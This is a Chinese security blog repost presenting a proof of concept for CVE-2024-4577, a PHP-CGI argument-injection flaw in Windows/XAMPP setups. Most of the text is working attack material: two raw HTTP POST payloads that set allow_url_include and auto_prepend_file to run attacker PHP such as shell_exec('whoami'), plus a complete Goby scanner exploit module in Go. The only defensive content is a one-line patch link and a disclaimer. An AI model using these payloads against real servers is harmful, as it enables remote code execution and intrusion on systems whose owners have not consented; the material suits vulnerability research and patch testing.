【代码执行】PHP-CGI(CVE-2024-4577)[goby Poc]

admin
admin
admin
138775
文章
114
评论
2024年6月8日19:23:35评论52 views字数 3440阅读11分28秒阅读模式
 

PART

漏洞描述

XAMPP 旨在提供一个简单易用的环境,让用户能够在自己的电脑上安装和运行这些技术,以便开发和测试基于 Web 的应用程序,默认安装会在PHP的CGI模式。在这种模式下,Web服务器解析HTTP请求,并将它们传递给PHP脚本,然后PHP脚本对它们进行一些处理。例如,查询字符串会被解析并在命令行上传递给PHP解释器,导致代码执行漏洞。
漏洞复现

漏洞URL:*

漏洞参数:*

漏洞详情:

1、打开自己的服务

【代码执行】PHP-CGI(CVE-2024-4577)[goby Poc]

2、使用以下poc进行验证

php代码:<?php echo shell_exec('whoami');?>

【代码执行】PHP-CGI(CVE-2024-4577)[goby Poc]

POC1:

POST /test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: {{host}}
User-Agent: curl/8.3.0
Accept: */*
Content-Length: 23
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive

<?php
phpinfo();
?>

POC2:

POST /php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input HTTP/1.1
Host: {{host}}
Content-Length: 34
Content-Type: text/html; charset=UTF-8
Content-Type: application/x-www-form-urlencoded
Redirect-Status: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15

<?php echo shell_exec('whoami');?>

goby检测exp:

package exploits

import (
  "git.gobies.org/goby/goscanner/goutils"
)

func init() {
  expJson := `{
  "Name": "PHP CGI Windows平台远程代码执行漏洞(CVE-2024-4577)",
  "Description": "",
  "Product": "",
  "Homepage": "",
  "DisclosureDate": "2024-06-08",
  "PostTime": "2024-06-08",
  "Author": "[email protected]",
  "FofaQuery": "body=\"XAMPP for Windows\"",
  "GobyQuery": "body=\"XAMPP for Windows\"",
  "Level": "3",
  "Impact": "",
  "Recommendation": "",
  "References": [],
  "Is0day": false,
  "HasExp": false,
  "ExpParams": [],
  "ExpTips": {
    "Type": "",
    "Content": ""
  },
  "ScanSteps": [
    "OR",
    {
      "Request": {
        "method": "POST",
        "uri": "/php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input",
        "follow_redirect": true,
        "header": {
          "REDIRECT-STATUS": "1",
          "Content-type": "text/html; charset=UTF-8",
          "Content-Type": "application/x-www-form-urlencoded",
          "Content-Length": "21"
        },
        "data_type": "text",
        "data": "<?php echo shell_exec('dir');?>"
      },
      "ResponseTest": {
        "type": "group",
        "operation": "AND",
        "checks": [
          {
            "type": "item",
            "variable": "$code",
            "operation": "==",
            "value": "200",
            "bz": ""
          },
          {
            "type": "item",
            "variable": "$body",
            "operation": "contains",
            "value": "<DIR>",
            "bz": ""
          }
        ]
      },
      "SetVariable": []
    },
    {
      "Request": {
        "method": "POST",
        "uri": "/test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input",
        "follow_redirect": true,
        "header": {},
        "data_type": "text",
        "data": "<?php\nphpinfo();\n?>"
      },
      "ResponseTest": {
        "type": "group",
        "operation": "AND",
        "checks": [
          {
            "type": "item",
            "variable": "$code",
            "operation": "==",
            "value": "200",
            "bz": ""
          },
          {
            "type": "item",
            "variable": "$body",
            "operation": "contains",
            "value": "phpinfo",
            "bz": ""
          }
        ]
      },
      "SetVariable": []
    }
  ],
  "ExploitSteps": [
    "AND",
    {
      "Request": {
        "method": "GET",
        "uri": "/test.php",
        "follow_redirect": true,
        "header": {},
        "data_type": "text",
        "data": ""
      },
      "ResponseTest": {
        "type": "group",
        "operation": "AND",
        "checks": [
          {
            "type": "item",
            "variable": "$code",
            "operation": "==",
            "value": "200",
            "bz": ""
          },
          {
            "type": "item",
            "variable": "$body",
            "operation": "contains",
            "value": "test",
            "bz": ""
          }
        ]
      },
      "SetVariable": []
    }
  ],
  "Tags": [],
  "VulType": [],
  "CVEIDs": [
    ""
  ],
  "CNNVD": [
    ""
  ],
  "CNVD": [
    ""
  ],
  "CVSSScore": "",
  "Translation": {
    "CN": {
      "Name": "PHP CGI Windows平台远程代码执行漏洞(CVE-2024-4577)",
      "Product": "",
      "Description": "",
      "Recommendation": "",
      "Impact": "",
      "VulType": [],
      "Tags": []
    },
    "EN": {
      "Name": "PHP CGI Windows平台远程代码执行漏洞(CVE-2024-4577)",
      "Product": "",
      "Description": "",
      "Recommendation": "",
      "Impact": "",
      "VulType": [],
      "Tags": []
    }
  },
  "AttackSurfaces": {
    "Application": null,
    "Support": null,
    "Service": null,
    "System": null,
    "Hardware": null
  },
  "PocGlobalParams": {},
  "ExpGlobalParams": {}
}`

  ExpManager.AddExploit(NewExploit(
    goutils.GetFileName(),
    expJson,
    nil,
    nil,
  ))
}
【代码执行】PHP-CGI(CVE-2024-4577)[goby Poc]
修复建议

安装升级补丁:https://www.php.net/downloads.php

 

原文始发于微信公众号(小羊安全屋):【代码执行】PHP-CGI(CVE-2024-4577)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年6月8日19:23:35
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【代码执行】PHP-CGI(CVE-2024-4577)[goby Poc]https://cn-sec.com/archives/2831205.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息